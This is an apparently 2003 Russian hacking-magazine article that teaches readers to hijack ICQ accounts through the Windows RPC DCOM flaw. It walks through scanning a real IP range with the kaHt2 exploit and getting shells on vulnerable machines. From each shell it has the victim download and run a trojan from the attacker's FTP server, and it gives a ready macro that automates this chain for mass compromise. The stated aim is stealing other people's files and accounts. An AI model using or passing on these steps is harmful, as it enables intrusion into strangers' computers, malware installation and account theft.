Территория Взлома Название: Вариант от 'Асечки' на RPC Dcom Раздел: Новые нападения. Дата: 19.08.2003 В последнее время я стал наблюдать исчерпание способов угнать UIN. Все сводится к тому, чтобы зарегистрировать не существующий (а ранее существовавший) e-mail и выслать на него пароль. Я решил немного исправить положение и написать эту статью. Речь пойдет о нашумевшей дыре в протоколе RPC Dcom на Windows системах. Информация о дыре была опубликована 16 Июля, 2003 года командой "Last Stage of Delirium". Уязвимость существует во всех стандартных инсталляциях Windows NT 4.0, Windows 2000, Windows XP, а также в так широко разрекламированном Windows 2003. Был выпущен многопоточный, многоцелевой эксплоит, эксплуатирующий уязвимость в RPC Dcom. Эксплоит работает против большинства версий Microsoft Windows 2000/XP систем. Поддерживает различные макросы. Этот эксплоит мы и будем использовать для наших корыстных целей. Скачиваем kaHt2, разархивируем архив в корень диска "С:", после чего открываем "Srart -> Run" и вбиваем следующею команду "C:kaHt2.exe 195.96.185.1 195.96.185.255 300 " и жмем "Ok". "195.96.185.1 195.96.185.255" это диапазон IP, которые будут сканироваться. "300" это количество потоков сканирования. В случаи нахождения уязвимой машины, вы увидите примерно эту строчку "C:WINDOWSsystem32>". Дальше нам надо закачать троян и с помощью него скачать .dat файл или любую вас интересующую информацию. Качаем RPC Exploit GUI v2, разархивируем и запускаем "RPC GUI v2 - r3L4x.exe", после чего идем в раздел "FTP Server" и запускаем свой FTP сервер нажатием на кнопку "Start". Выбор трояна для использования оставляю на ваш выбор, этого добра в инете полным полно. Допустим что вы выбрали троян и создали сервер для закачки, назвав его trojan_server.exe. Далее кладем trojan_server.exe в корень диска "C:". Возвращаемся к нашему эксплоиту и выполняем следующие команды: 1) Пишем "ftp", если все правильно, то вас перекинет на следующую строчку. 2) Пишем "open xxx.xx.xxx.xxx" вместо крестов - ваш IP. 3) Если предыдущий пункт выполнен правильно, вас спросят имя пользователя, тут пишем "asdf". 4) Пишем "get /trojan_server.exe" чтобы атакуемый компьютер скачал ваш троян. 5) Пишем "!trojan_server.exe" чтобы атакуемый компьютер запустил ваш троян :). 6) Пишем "exit" чтобы выйти с шела уязвимой машины и начать поиски следующей жертвы. Я упростил эти действия, написав маленький макрос. Макрос должен лежать в одной директории с kaHt2.exe и называться macros.txt. Открываете macros.txt, стираете все содержимое файла и вбиваете следующий текст: "[Macro] name=upload_trojan key=!1 delay=900 cmd=ftp cmd=open xxx.xx.xxx.xxx cmd=asdf cmd=get rojan_server.exe cmd=!trojan_server.exe>>a cmd=bye" После чего вам остается лишь набрать "!1" в шеле и все эти команды будут выполнены автоматом, ну а дальше пишите "exit" чтобы выйти с шела и начать искать нового "друга" :). Вроде бы все разложил по полочкам, так что вопросов, думаю, появится не должно.